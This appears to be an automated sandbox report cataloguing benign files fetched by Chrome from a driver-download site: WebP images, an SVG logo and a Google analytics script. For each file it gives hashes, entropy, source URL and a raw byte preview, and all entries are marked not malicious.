      Preview:RIFF@...WEBPVP8X........+.....ALPH4.......v.HzQ.0......A.Q.g.]. ...U.`..]...V.g%...nDL.......}h&2.I.H...L.@...u....!.n.a.,Dw3..o......C.=.. .../|:..o8Jk.;.~....q. ..:>7#..@...cY.!H...F..$.......)..4..f$..i.NZu.nf|..SY....Rm....C.j....j.J....c..l..G.....:.g.5%3?...Iv^.J.E.5>.TPw.2.cY.aP. u"3/:.H..N.n.#..IjCv../v.*%.4^....4^..E.+.....vI..5.w^.TD.....c..?..d../....Z...x.....V.X.q7....X.r.^.n...$......D..ft....n...$.,.:M..yp..,.C.]...)...`..@.W.,.D..da.'?...o.M..o.^.X.M.dYX........J.N...@.N...B.Np.nt. >.....c..A...F.*|....h(..d.h'.......bL.....<H&.>.....#.>L:.W.h...{D..f.Wq...-.U.....q.9....~...].......Jz..h.=.!.r....../z.....?.F88.fy.x8x.,......'...;.\>..i,^...<.....p.......g..\....}..y...B..7.{b.-.......P$.3..Z".5..@fk..<f..m.4f...._.Q..wx~...) .e.wq.hH...S....!%..].y..'N.^.K.....^....yC....2]U>o...^..tI.......\....z..ZhwTm...1[c..a...3.~..QF2}.|F...A....Y^#jy8>.l...kD=..1.|C}...1.f.o.r].jS.h.....z.O.. s....6[.sA..o...`....6.@..B#..-....Oo
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:dropped
      Size (bytes):2250
      Entropy (8bit):7.87295014058753
      Encrypted:false
      SSDEEP:
      MD5:D662C4A5A08456735199D092BFB37703
      SHA1:2551DD596D303AD47637F66D4EBE15A97212C28B
      SHA-256:22CA0257BB0F9DFD6F3C60C2699A2333362D0F0E1FB563C6DD53BBC035485F89
      SHA-512:55755361B5491FCA81802974006F64B71B38F51A09D45AEF41EF24D561895E3D5EFA233CD201117A7B7C788CC25E69CCD3F5306CAECF989BFD088BC71BD9EA36
      Malicious:false
      Reputation:low
      Preview:RIFF....WEBPVP8X...........m..ALPH.......m..k..'Q.%.J.%.B..%Q.fQ......R.-DY.e.$M3.7...o...........GI...j^]?..,.m.BT.*......z.^T4]?NrE.69..L.KT6...E.U...?.<.M63....Yn..m...4.ub..T.B..+<.K...`....M...j...0;...Go.!.Bm..<........]l.`&.B.....^rq.]L...]..j*sAp...+....;$.P....V....Um.aN.Q{y..v.2..6.{.~....B{..M*Q..(V.~.>.5.....N..o...}}.Z<..5..)-.S^>.#.;..f<.n.X.j.....u..gS.y..Q....C........x.>.u.gI..iv......9........{._][...+%m.q...}|..4.]o.(N..._.I..%..Wv....v......eY.].....4........+....c".`.#....6.:@5L..[P...E..Y..*...8.(.JZ...Z1.,..9.......kA.....O.x!.6.......i4./~....[..O.~s...Q...#a\)...!.c`6$.....yU..b$... o...dfJ.;G..d4....p..1l...n{%<.7.......'..P..a...q.I...EJ.gzq.%j...!.#....iGrNdz..9,..4.b$.G.~R...T..(#....g...#(.+...x..A....A5(<... .......^"...4..vA=..{`.S.|..u\...3e.z.../.&..[e..xH}..".Q..gs.cn......Om.G.ygY.[r.....7..GT....yO....#.....&..........j..".L ..Z.M.......j..6f.d.*..c....@v.?.ix.plC..y!...g...-..n......]2$..Xm..B.6
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 564x712, Scaling: [none]x[none], YUV color, decoders should clamp
      Category:downloaded
      Size (bytes):8786
      Entropy (8bit):7.972075725519834
      Encrypted:false
      SSDEEP:
      MD5:320AC45C233EB2483B3F5D6EE2CEA8E5
      SHA1:A89D42FF4DC0882971997C209085473C733DD94A
      SHA-256:D24622E1DAE7587D311B5ABCB6100AD59C00F2BD4DEA4B243E0DD4546B150132
      SHA-512:CCB706C116C621308DF3A4526A32601B456B43B2CF3D258B41B2DDB4F42B0FE22102FB0E82D97572C5543AC1B6F436EF07608F26AC1A0413B984B6F0B9D0BD5F
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/landing-author-image.webp
      Preview:RIFFJ"..WEBPVP8 >"..P....*4...>.h.R(&$"..I1...gn.j....._)..wI.>....~.O$....#..6>l...2} :i........?.:..I....S...?.z.w./..?..........k...C.................[.l.._...2..<Z..0....M...8. ..Wi...fK"C/._...2._...<.W.........x......A1...6.V.g.._.X.r.Y.....s....2J.....^S,.....H..&6../).:....8.q.o.N8.e.2.e.........}.p.%\...b......9)l.._.....~e......E.^...-...V.n.9R....q.~e.pQI...Ko......-....!..$...1.o`.y q.V.\..jo.)....|......U..zv@....X.../.*...X<._..-.0!b|.k.:..?.._..:.b...Ll.0.P.6..h......'.\k.x..........<4Og..K....J...q...t.....Kv...7VR.n:v.N0%\.....?n.......w..0X3..p....?)..'0..4z....q..Lm...EC...b&..U.G..I|.8.6...~..C.11.....e..}.q.>......Y.........r.~.L...T.n......N.......d3......T...pjz.{...:_...~.>......u..._...1..(......zD.?.)..h.v.~..v..Pi...w.N......L.j...v...U...N...!.;.w8....0..7.8N..L"/...*..W.{V.9...,.....R.e.....S.3./.....5]n....H..b.......4..R._.|5.|.G.k!.........`!.$..5.2'...e....C..........b.....I...(.V...zN..yX..Z.yL...2
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:dropped
      Size (bytes):3786
      Entropy (8bit):7.946097904344635
      Encrypted:false
      SSDEEP:
      MD5:D1C71A5BB6F4F0290725CE14F41E9145
      SHA1:A852A23DC9F4B09E33EAC305B862F4D10BBD6297
      SHA-256:A49FDE88FB4A0B338F497EB07148FC84D68270AD3C8CA7F004AEE9A6DDC73EA2
      SHA-512:2E6508254517C35B030F2E8691437ECF12E5D6A66B157B0559F4CC56149B4D250EFBB554E631B0E0A315D3F6FC4A325E159EB5E17847CCCD10B469A91EB6F1C2
      Malicious:false
      Reputation:low
      Preview:RIFF....WEBPVP8X........+.....ALPH*......m[.h.... m.5X.5xQ.v@*p..B\f.....28#..9G........&0Wo.&Nd6..+"#.a(...<......E..F?x........z...@Uh.k.g.W...".8 k6...$IJ.zOI...$I..S.8.lw.N.?...s.]2....!..._.Z.K..-<....{q......-..N.G..C.3.=*2..?K.?....y.#..n..|..jX.u)..[.l.ek-[..q...q...>..|.......B.s..Q..R....Q.<rQT...Q*=rI...}v.j...AU.$R.|lXT.Z../).V....(......R.|."U.. R.....sI8^...x.K....@UHU.*.*P..4.VSHW:U....U.NW..............4...u.MS....X.\.Yk...j.33......U.}6..\......r. ..m.K.-.....T.T..B...;W.t.\c..\u..a.....,\..68.....P.".&p._.........>=_...8c@................#IVP8 r...pF...*,...>.B.K%..%".;....in.?[.tsz...5f.N...m...o..;._7.....s.~....v......_...%!..../.;}.....[/E_..tq....$q..c.4.2..$q....z.&C.>"...p.....;.&...r.SG....5..(9.C..X..b..R.!H.`}`.z.x5Nj]Y.\5.I.k.......W..'?......E.:0....{..r..U......4.......g.....xS1...K.....H...W.b....R...&e.{V.j&.8..+.tx.....I..'&..A....1`......B.....`..8..|.C.A..2..7.-."p..u.a.. Tau..j<G.e...^......f.1(
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:dropped
      Size (bytes):4138
      Entropy (8bit):7.947712946943157
      Encrypted:false
      SSDEEP:
      MD5:CDD804204EBD86F70AA9AB3A8964277D
      SHA1:5AC213F183D9E7EAC67FB5FD08A78817F8F7839A
      SHA-256:6F4B7E78B45E1A205EC7AC6E722CDF205835D6608741E3B80E5B9A72980BB605
      SHA-512:5EB55ECF42E858A3706D9D4C2E6EB3C0CED6E8D127757C762A1DB0B2F73F7FB1692893693063C2CCB9361A13EAC5EC75E2785340126E203277AAD45147CF7E31
      Malicious:false
      Reputation:low
      Preview:RIFF"...WEBPVP8X........+.....ALPH.......Z..I.....=.F+..B.?*....z..#...)%...V.q.[.........o.........eOmE.J.\...6..T.R.e.B.W.?iwd.....O..:n ..c....cM.S.6...W..H:p..7............-.w.,..i...:......~.2~.a..]_......U.uW..4......u.Q...S..h..N,p_..v...4Z..S...[+...z.....{....+.U.".p..dkp....v-zg.0.......W.....3LC.e..V..66.........0(....?.].w.^F=...../.Ko.......n7:....z..K.:.........m[.n....^n..3.$!I.......N.q.X.O...~...i...3v..^.;z;.h.......h.n1f;...iN....E0..G..$i.i<.3}K.;l|q.h1 p."..C,[h..;.,.9.."T$a:e.HRv@.2....a8e<..D.N.b...SA.0.?......H..q./"U..'b......$-I.x..K...i1"^.....U....=...)B.X~.K....:..3c...g. .V,)2.|@d.E..."...9...+2..y......D..5.#b.p..|E...2L...[.h|....1..<Ae...U.C..)z.=. ..G...1P.D........Q..N.s..pp..N4..d.m..F...b9..G...e..C..G..;.h\.._......Q...D.F......kv@<K'.v<M1.=..)...,.4....C..S....9.... ....L..-.. .X..-H8...?.$....+t.x...L.eSY......[...=..*o.S....\...)...O..:..+c,..1.....d.).".b.N...Q.i...Wl)y.;.j...f4....BM,.
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1441x760, Scaling: [none]x[none], YUV color, decoders should clamp
      Category:dropped
      Size (bytes):21520
      Entropy (8bit):7.988814899848883
      Encrypted:false
      SSDEEP:
      MD5:217C35C775632F88AE182FA07D752BD3
      SHA1:E062EBA0C41EF1C2EFF08D073EF23D0549F89FEA
      SHA-256:6FB45D7426D3F89D3511D9DB3F80F245C16D16679AAF8532732D725084F5E42E
      SHA-512:53877364712D1639FAF0E36BFEC8F60F8B8006BD03298BD134BDEAA6AE4F6407ADCE70EEF675D9AF1F4336443EBC3E7474479892DFDA696E2D4E199962636875
      Malicious:false
      Reputation:low
      Preview:RIFF.T..WEBPVP8 .S..0....*....>.f.P(?.-..)....gn.g...M...f.S.......U.o......~.~..'.6...)?....3..6?.....?. ........h.u...R.w..=&....'.I....O.....>.....-..........^.......6.J...W........>D:V..dq.!.~##........|.t/....A..^_SlD....E.E<..O^j.M...../i.e....)dN......w.<|.t............M4..b?.....HDK,?3......w..\...v#s...9..eb.)...:.T.0cG.E.8Z..h........1.g..u.7..N.P.Xq.n".VA.C.}...T...K@tS...`p.#.T..{.E[...&.V.=.e.t........[.........7..2X.y*..X2.cW.0.=...i...C.0..3...t_..y.....f.W.+....R..y..0.8..i...\.HDT.-W..8.+...G)..vW(3.}.(..D".....n..j.g4W..K..n.|......yQ....'..dfk.Q.6.Os...R.m....d.]S.=...\.....p/..."..8_.m.|........-.\.b...l....4D.>..SEd{<....S..........t.......BI.!B..V1..#P!.y....\....t.U+ ...|fE...:...r....A.P".....J.G..Y.....:m...g..].U....z{.&w...\..7...},....KY..f!]..L..G6. .+...<6.Eb..b.t..ke.q...!...-....=j.=..*....y..h`.4..9aj m.!!.`I...K./.~..Q..O!;.{).......w..].....?...`B....0X.....Y.....2\.2.Ap..m8.A.7.~.>.-
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:dropped
      Size (bytes):2398
      Entropy (8bit):7.871194289866776
      Encrypted:false
      SSDEEP:
      MD5:47C82182A84017A970591799BCAD069E
      SHA1:F5657CC5D710D1719CE8716BBB55B81873345335
      SHA-256:3CEB5938CC64882C00758E2B86EBC4D3E2D2A3BF6CB6D54A62DE0AF4148072DC
      SHA-512:6ADF919C40953F498F4FAEA3E740A60562690A8D173ACA99478AEE2A4DB7CBFD5CE6F7681463ED59266ED19D24ED238266B73D15FD62BE1271AAC9F1425EB3DF
      Malicious:false
      Reputation:low
      Preview:RIFFV...WEBPVP8X...........m..ALPHH.....Am......A.\.%...O..I.d.Yk..o$..4L.tl(..(.. .Z...5..>"b.....X......e......eGyY7....MU....../.....j.Jn..-e3...1...&.F.d9...]..cJ..._...+"...W3..B..[.."..v .E.".*.;.9.L....5..E......A....Py_v.....~...).I....R5.A.P......DA\SM..ogO(.2....G..z.........Y..U....eYQ......$.....X.8.....+.c.0z.....z.sG..?@=.).....V.i+.LPtz.!@..=.H.....v.e.Hm-..f.>h..6.J(....I.(...3A>..`..<..>M..v.f$..[S..Dj..$,.~..y. w.`.A.q.:..v_.>.....0#..~^\ ....A..9.)....'S.......N..L....z...`.T.@j..#.^.v...@B;".=.....5.....HJt.H...M.G.,..p.>.....=...(...v.{....BKEBW..V../.@..$\......EkU..............x....Y.!...Di....t}.....T.i5.\f.\...O..U...P.g-..W.)-.B....I......VO.>M`.6m.._.v...R....{.....{dyY.z........T.x....<.'.wf..0...g@|..I.k.H.../...I..4..o..r..l.l.B.F....T.8.....^.._.k.N6.j=&.s>0.*XE.. .?...%..a..P.z=?h..0[..N.w....[.;....M..<%)..Z2..t.Q..](+p..^*...N....$.6.FZ.....T_n....'..'hHO..N.tA..3.. =8....j..6.....h.3....d...
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:Unicode text, UTF-8 text, with very long lines (7389)
      Category:downloaded
      Size (bytes):272353
      Entropy (8bit):5.57907851796277
      Encrypted:false
      SSDEEP:
      MD5:E664225CC610E448AE7B1A5CCBF5A4FD
      SHA1:ABC871776D92E1975BB4FE337320AD49D6EE4159
      SHA-256:4BBA4D8F02C6B09560BEF73E5233526B1D6EE4227BAC5E359704FD007D18DE73
      SHA-512:CA08B9933D7D718C529C4688544492648B5F93CDAC3D2609AC1D27B75A0AEB0F6723F6D3566C3638405BD4C0DADBE6C4DE5F380A2D8B14CAF7D10D1A05C0FFC3
      Malicious:false
      Reputation:low
      URL:https://www.googletagmanager.com/gtag/js?id=G-M8T094SP0R
      Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"vtp_signal":2,"function":"__c","vtp_value":2},{"function":"__c","vtp_value":"google.co.uk"},{"function":"__c","vtp_value":0},{"vtp_signal":2,"function":"__c","vtp_value":2},{"function":"__c","vtp_value":"google.co.uk"},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":19,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_autoEmailEnabled":true,"vtp_autoPhoneEnabled":false,"vtp_autoAddressEnabled":false,"vtp_isAutoCollectPiiEnabledFlag":false,"tag_id":10},{"function":"__ccd_ga_first","priority":18,"vtp_instanceDestinationId":"G-M8T094SP0R","tag_id":30},{"function":"__set_product_settings","priority":17,"vtp_instanceDestinationId":"G-M8T094SP0R","vtp_foreignTldMacroResult":["macro",5],"vtp_isChinaVipRegionMacroResult":["macro",6],"
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:dropped
      Size (bytes):2582
      Entropy (8bit):7.8919236589406045
      Encrypted:false
      SSDEEP:
      MD5:AE0961A64D990586D1247EBBB86CFD29
      SHA1:8479F172D285BC8D24BACFB6E80020B3C7FBF751
      SHA-256:AD52C4459013C15577F278D7E3D0AE4810D5966EFE190B92FB614F44EF787672
      SHA-512:CA625CFC095FBD8DCF5DF6357B76E04E08BECCEC1801A8971CA3675A488A0BF89CE42B2229FE0EDAF2AA0B551B1FDC03C497FE0B96E52D14655793BF159F0E25
      Malicious:false
      Reputation:low
      Preview:RIFF....WEBPVP8X........+.....ALPH.....W.4.$5zu.<?.... .mO.E...?.........P1V....2.9@`..*.........i4..w#.?....w[F.[z.}.'......G..Q..............O=...G.ye...d.Q..8..\&.......l?....,K .....^*C.&.,K.T.T1........T...Q....Q. .....GaG.8..Q8....:..M.N"p..o_..r.L@.....Ks...!.f..|...............z...@wzd.....t.2..R.L.x...NYP.?.3.7..r.:.l.....X...lJ{..K..<.....-.vzc....ZF...`s].%....D}....fa.....&."....Wn....>........DBLB...8...]T.'.&."Y$..U.E..$.|.L$D$.3e.TT.T..2Ne''....T..d.Q"......VP8 .....4...*,...>.F.K...%"..`...gK.z@%0...sy...:?.=...KN.w.9.t?......B$.\..x.}....6.X......p.|j.j.V...: ?...[.>.....f.N.FB..x.!.2.cF"1D......V.k.V....B..Qb......F<y!....-y.....w..V`*.lb.Ieg.....9.:K.......B4%...:.....uH^.;....hp...'.%}.C...m..k..Q....W.m...3!t............I...1.lPDb.M..../......&dH2.+.n..T..qT..A.. ..>..v.^%..5..o...f....X!....)....jX.+\..b_.^.7..+...... ...t...C..........p.|j.j.V>5y.vF.+........_./J...9......E.w#....V..s...Af.Z}........$a.E....S.
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:downloaded
      Size (bytes):3136
      Entropy (8bit):7.904739727628465
      Encrypted:false
      SSDEEP:
      MD5:AEE8B741BFD0FDA6A08AB60555DCE31B
      SHA1:FF0D5F417E294B422535B18AC9137E5848D78C73
      SHA-256:AFE56EAD033FBB7A2939FA5A582F8520A0385622F0578D858F3605188CF1408A
      SHA-512:05C58C4E82022D7B979AC8050ACC61EAFE1CD4EC1A73C743223100EEF457A530B2CFEA89D0CD5106FBF5A8F6EC3A9407BE280A8501107451D5E1806E9318BE4E
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/vendors-landing/samsung.webp
      Preview:RIFF8...WEBPVP8X...........m..ALPH.......m...z...h0.E.d...0.e.,K..w.I.,...A.$. .&.._..~..V.......]l8.`.\...f..V<.V.|...9=&..2...gz.e.;.yQ*....ru......]...w..^..G.D.c.Y~.'...]h..._n.y./...9..y|8?...:]Z......O..f....On....IV.>\..|......S.p.>.?..\.Ge.~?k..J..r...pwQ..j...0.5..M.0.7..*...tsV..O.{....|....]..g..O......H.|..e..=..s.*..?.a,.5................+s`..._b.!;......S....(oP&.vxR..CW.!?.ORv.g]...`..*kt.A,[..I.A_....%_.6`y.S=...u.y..A.C.......].5.1xh......T@..L.S.e......i..X.N7xU..`...L.x..........W......&..=53..\....M.G..M.........a.I..z@...n..W.~....~.O..sq..OWB<.a.PX.......'...{G...-...]..v..c_Z.r2.`mJ..#=H..Ci2...n...7..Z..^.J....'..0.....v[.nE..`..r....b,.$..(5;aV.-...p..F.Z..3..r.F.)..6.a...Hz.&BL......6z.]..p!y~%.V.n&-..-...,L.L.,.u...k......mW.}{);&. .%R....B.......2..'....M%.aL+.@Dr.....n3.....D.k!.J._T..r-D.....d...\p...`ljv........z>..9,..B.&i....`".:_H..=..n.#1.....4..........~.._.=..\:..C1.L..Ht.....SI...5.$....}...Q-.sX...X..baB.
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:downloaded
      Size (bytes):7112
      Entropy (8bit):7.970243461143833
      Encrypted:false
      SSDEEP:
      MD5:2EFCF1DE7108F0FCD4A1729BB8CE45D6
      SHA1:A4347D527E1D7ABE70D8A13B156EFBA68DDCBE25
      SHA-256:2556E4C8FF5558A61545A56A626A5B0B1156EA2FA31C7A2466F833D6B7620E26
      SHA-512:5F46DE0D6946078CDD9EB00FE9B0A895983074AB999F0ED0C5BE3B0ADBE986D32E707931AA7FC602F785553ACF178B80C7023D4A299CAEFD42217D92F5D865A0
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/publishers/cnews.webp
      Preview:RIFF....WEBPVP8X..............ALPH.......i.0...;.""I..Y..F....$."?...c."Q|.a.=9..m&" ...H.....9|.'...7..((.E...]m.`...3i.3.:.....I:.q..AL.....IL...`0:.. h.'...1.Vb.`R-t...Z.B..-...u....8.>#..l+..M2I.<..Ao..>=..........|...H.h.{...V.w.L...[.G....|.....6..w[....r1...^O..N.U..k..}BW..s......l..;.u....~$..m."..'j.AM..fBt.......S..I.A.K/.....w{....C.kkN6....N?N+y..........>H......!..Eq}0'.z..i..F8....y....Z....w....W..7l..A..I.^.....e6.n... .s.I.,6.8..oGeC1d..zM.....n...>.1f.-...r{...gmw....o.<Vt..Q.j e.AQ....... N.W..@.e.'.9MT:...:....2.9L..yq..K.^...V.b.OG.KPp.......d.J.$.bQ..Dd.....g........i.N...2!..NA...f.."7.)v...b.y..H.....G.Gx]..PJ.s..u.l.......q..]........o#I..=.A.X..........?Kq.&7NL.s.......H.V.}).[.g.w".)..L81P2>.<.h.).....@l3...i.-.0.*...%.r(.8S.\.+-.v+...:R.8..FH.m....,..".X..v*.$..)&...Oh.n...........4. b..P4..A..UM.0......@4...._.~.L3$j......'9..&/... ...F.,.AL.D..0.6.. U...D^..k.gV.\.(..T.....5R.i.8.7..2..9.h.aiKfAGqJ_.....\(C#k..........
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:downloaded
      Size (bytes):1038
      Entropy (8bit):7.722375907741936
      Encrypted:false
      SSDEEP:
      MD5:884058F1BAC227D756AD5DD0D073E5F7
      SHA1:E4C1C63D4D0CB708E6BDFBB8947E37771CBC9571
      SHA-256:60D572FB90DD3628C3548D367B7AF2294B11F63942371120D56A5A1CF6F689D6
      SHA-512:4E781EA426E6F920EEEF1FC14269050D46B92BCA5E5AAFF60DF456BBC56865C419651A2E2082BAAF3F16CA541E514C8B9B2D2355A1F563FF67A72C7EB4172F36
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/drWeb-icon.webp
      Preview:RIFF....WEBPVP8X........i..&..ALPH.......l.").$....N5.3..?.pw..?.jp..ww.....C*ww....l.....V.%EDL...m.xr ..z.n...:7.5...c.r.Fom.......@zfff.H.....f.}..b..'......F.".5....LI..\.............6... .~v.MMRz....+.q.3.]W<.k.!?:.....$.."FnK$.C..a]......\*.9.<...{{.._.P^.L..5k..+.<#_a.I~5rI..%.u...5.~Cr....Q.xR..0..oZ..-2.,L')B.<....D.Xh....-'.....8v<....M.........K'-.&c........C.]I.. .5.$.].....3(....l..s....I..?.....j........[..$.W...*..?...D.MH...@[....q.....r.h....@.........l .........8~......H9../.*.k|V^.."...F.z@........DZ..Z.K$)m...\...\..._..~ .n|%.[1.A.V.W>..H....&V(..j.+...$...`b..Zl.w..r.F|..._.r...DuZ.V.4S.H............nh......../N3.y.......7.?..^px.~N...H9.-^uF...B#U-.....?...?.VP8 ,...P....*j.'.>.^.O(%(.&8.9...C........6...i.o$...........D........7...ek.+...R.h....t....?....d..|i}H~.-.~4...Jl....}.......A.'....}...m..e.W.....7.J.c.......@5#......e$.Yf+.Y. _.y......u..z.j.Q>...iQ.j..G.Iv..{.?B..E.....5..+./_....L..h.q..*...[.x.n....S.=
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:dropped
      Size (bytes):1660
      Entropy (8bit):7.854740651384391
      Encrypted:false
      SSDEEP:
      MD5:CE78AA6EB22E8C5A706888A9737460BF
      SHA1:D3064FEDC6090BE89731593896CB19B96353FD9C
      SHA-256:5059A39CDEE0681FB51FF7ED619B251A45E74063EA04373D5D5F1E96A2A2F323
      SHA-512:714A5EDF98947317E6137F4239C11BBB034A4DDF448D3D311CB5E117186AFDE3076D821B4A6DF409F73EF66DD8FFDBBE52EAFB7E5A67930CE1A9782DE93B2282
      Malicious:false
      Reputation:low
      Preview:RIFFt...WEBPVP8X..............ALPH.......l...zB.0H....Y.....P........Z.....!..JD%.I2.*.l.W.e...&.E....~t......._....<.D>...z...]..<....HCu.....I..l..:Ar#..$..wn.1U......T...V..*4[T.!..\.....f.*2l..g.Ld.)..&...o.I...]..8.d.16..*2.J...-...........T..U.....;l.,Z.L....z,..,.....u.7./d.!.........[W#."kW.>9Y.omR.z..Q.M......G_..%.7.v).0..$....D8...$.b....m....[/!.^/{.O.}..%..........)X."..#.g|T.....wX~.C...2S.}...S.JD..=.eE..Y}9am^..!1.....Q.....2.......6e..K...36fF..o.1e..6....|....<.....]3+P.}.8..R..../<h.(.s.M.C[~..!......J.+...I_u....3M.....E+..#.q~......y 2...e.......]9......>....<o_.L.(.=.....x+..........'.7P.P0....&Zj......%.h....;...t...t..".D.E>. .O....R>%P..:.t@/....xh....+.S>.....+0.g.z..@'....S..xT....L>.p.............G.....u..t.D:..I:..O.Fy.....l.gG....?%..}.V2-^..I_..._.&..3..$s.%...A#..`.Y(t..L&w.P.$...../A%...C...P...<>..V..V......DGF%V.&..f.;.5.k!1.-i..;V.....y.b...Cl.R.....7....Y`S....o.XI@..:.@...~.....v.....n..=S..
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:SVG Scalable Vector Graphics image
      Category:downloaded
      Size (bytes):11473
      Entropy (8bit):4.627892048411193
      Encrypted:false
      SSDEEP:
      MD5:871649CD3ADE918066A2AF1BB93BAA83
      SHA1:13B5423ABCF4E04286DB564D3A4EB43CA70C0A37
      SHA-256:E9A1CFD5FBC88FB4A6C060C2CFBD50CABCBF0A7535C6EF502407EAC3CDA31670
      SHA-512:4E3FA4207574C7A912BF482D3BBDA9E63AC9EE21DD5B667779B8488A8F5A3670DF97069A06709F105A755C59DE2ED4A0AB244D1921B2D3A59C1794A46C137590
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/logo-colored.svg
      Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg width="125px" height="36px" viewBox="0 0 125 36" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:sketch="http://www.bohemiancoding.com/sketch/ns">. Generator: Sketch 3.3.2 (12043) - http://www.bohemiancoding.com/sketch -->. <title>Artboard</title>. <desc>Created with Sketch.</desc>. <defs></defs>. <g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd" sketch:type="MSPage">. <g id="Artboard" sketch:type="MSArtboardGroup">. <g id="Imported-Layers" sketch:type="MSLayerGroup">. <path d="M45.21,1.869 L49.124,1.869 C52.666,1.869 54.979,3.971 54.979,7.594 C54.979,11.217 52.666,13.352 49.124,13.352 L45.21,13.352 L45.21,1.869 L45.21,1.869 Z M49.011,11.557 C51.34,11.557 52.828,10.182 52.828,7.594 C52.828,5.039 51.308,3.664 49.011,3.664 L47.297,3.664 L47.297,11.557 L49.011,11.557 L49.011,11.557 Z" id="Fill-1" fill
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:downloaded
      Size (bytes):1668
      Entropy (8bit):7.855405101276206
      Encrypted:false
      SSDEEP:
      MD5:75F29BDBAE7571AC269163A8A59D7E99
      SHA1:9F45CE05A3CA1E18F945F004424150746EC79BF7
      SHA-256:271AF9004E4F787DDA39062DEA17713B05A343BC60CBFDCE585C378531414BE4
      SHA-512:CCD366EABC6567459E3C2DCBE0C4C0F3E9C87BB5BC71656144C63C82CB94E51BB8233B93DD86B8A93399D4B8D18E86C6E74B9B8A455ABE085328B88AF8582CD0
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/vendors-landing/msi.webp
      Preview:RIFF|...WEBPVP8X...........m..ALPH............Y".P.......!Q(....PHT..2..<K.,u.Z......,M.....u..p.m$)3{.IZ./.?V..?...Sm.~!.%...)Q....K*!;).pGf.'E#..:%E].i.q....E-..4......5...'U.!.>0...l.i.{.wA...F.e|j.X.....&._I.<....x.V......"..O.p....??...A......-YQ..HhH.tM..%...]K-'ZN..^...B.8F%1.%..i.L2...B.v..>..}...f..s.....>...8..........9..W....KQ.M.......hEN.j....wyQ..D..;.xs...d..........h.e...o;}&.3a.{...%.<.........)(.....[(.3............Y...O..RS9B...Sz..5....(...q0.'{....a...2.....Z\..]2..yF..gl3........%.#..3...dt...1........c...>.V...."%..G.R.I...b.J"..1nf.Hfd...;..x._ . !...F..k&%.j?........3'........f..Fo...Jn"C.....f.@m...o..L..^......yf..5q.%>13.....B...._..J"9..+%f...b|E......J.....iJg..h ]?-..=.<"{4.VJTVJ,I.y. ik...WY)1BJ\.(.3...........;.Djx.HW.....w.S...SF....|....)....d.).6....g..t.]:.......5.vJ$A...5....>...MwW.Ti."<....ivN.Y...6J\........l..M.o.}.v.w.2..l.D.#..J........../.z...{.w.OT.jvN..z..`.t.L.$"n.....7..<?.Sz..9H.5..K..u.....W..#.n.
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:downloaded
      Size (bytes):2262
      Entropy (8bit):7.885697230598887
      Encrypted:false
      SSDEEP:
      MD5:55537187D3C851F2177DD522E30A5137
      SHA1:01928101ECA66F2F7B77FAE8088D638A8AC54891
      SHA-256:4BC02EBEC4FEBFEDD2DB0C535FE701A4BB1846B8667AF1F87E2B90AE2F52B1A6
      SHA-512:2DA201352A91D7870C757C6172D3D45D604197A95DC35656005D6821274BB7BF268DDEDCBB56CAFAE03B4AB8D789DCC053C9CF0B2E28DB460B3B8D9EBF758B44
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/vendors-landing/dell.webp
      Preview:RIFF....WEBPVP8X........o..m..ALPHB......l..Z...4A`jP$........n...Caf.9.$..P.... .B.>.A...U......I..4!.'...[..gtDL..........x..O7.......Z.....<..}....9..4....&>..D..DSO.}..~e.y.*~...H.5..`...l<l{.T.k...+=r;....v....6....r....P.v.s:.E..t.....6.p~/.....y....!L..Z......aro]@..&.[..z........tb....i&..5%<R.{.g.K<.....WM.....M.....<......M(.o..T`...}...P..(..>...x...X.y.%.c.6l...:.b....Iua&d..r..YX..S..=...{.M)>.M..g....a..N8...E5...T.. .8.m...r.W.......Rc.y.....'e...6....DD5...*...X...3!v..TOmK.3.oi-..`..R.K..Z.p...>....#._..-6..*.2..[.?).f.[T.0.N..X+.S0.>6..&OGu........}.....&...ht....w;bS/..J.\I.........(.[E1..C._.9........ 